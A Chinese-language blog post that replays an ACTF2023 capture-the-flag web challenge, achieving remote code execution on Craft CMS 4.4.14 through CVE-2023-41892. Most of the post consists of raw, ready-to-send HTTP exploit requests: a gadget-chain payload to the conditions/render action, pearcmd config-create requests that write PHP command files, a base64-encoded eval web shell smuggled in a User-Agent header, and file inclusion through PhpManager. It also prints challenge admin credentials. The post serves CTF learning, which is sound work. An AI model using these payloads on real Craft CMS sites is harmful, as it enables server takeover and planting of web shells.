ripple

ACTF-Web复现

  • ~12.03K 字
  1. 1. ACTF2023-Web复现
    1. 1.1. Web
      1. 1.1.1. craftcms

ACTF2023-Web复现

在学长的输出下,协会web AK了,真是太强了。但是我好菜,没什么作用,痛定思痛,好好复现一下吧。

Web

craftcms

Let’s RCE!!!

根据题目描述可以知道是实现RCE,靶机启动之后是一个Craft CMS的开源项目,顺藤摸瓜去找洞,发现4.4.14版本有两个重要的RCE的洞。

CVE-2023-41892 CraftCMS远程代码执行漏洞分析 | Bmth’s blog (bmth666.cn)

奇安信攻防社区-某cms命令执行绕过分析 (butian.net)

具体就是找到了这两篇文章。

构造报文读取phpinfo:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /index.php HTTP/1.1
Host: 61.147.171.105:64298
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://61.147.171.105:53564/index.twig
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

得到账号和密码:admin/actf2023passW0rdforCraftcms

点击Go to your control panel登录到后台

可以看到版本确实是4.4.14,这里一开始想要利用后面的SSTI的洞,但是发现把Settings给ban了,那就和SSTI(第二篇文章)关系不打了

在第一篇文章中利用PhpManager.php是写入木马到日志中,然后包含日志实现RCE,可是这个题把日志也给关了

那该怎么办呢?

在不久前结束的NewStar2023 Week3中就有一个pearcmd的题目,利用pearcmd实现,那么我们可以直接用pearcmd写一个文件,再去包含。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?+config-create+/<?=phpinfo();?>+/var/www/html/1.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?+config-create+/<?=phpinfo();?>+/tmp/1.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?+config-create+/<?=system("ls%20/");?>+/tmp/rce.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?+config-create+/<?=system("whoami");?>+/tmp/1.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 199

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/tmp/1.php"}]}}

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可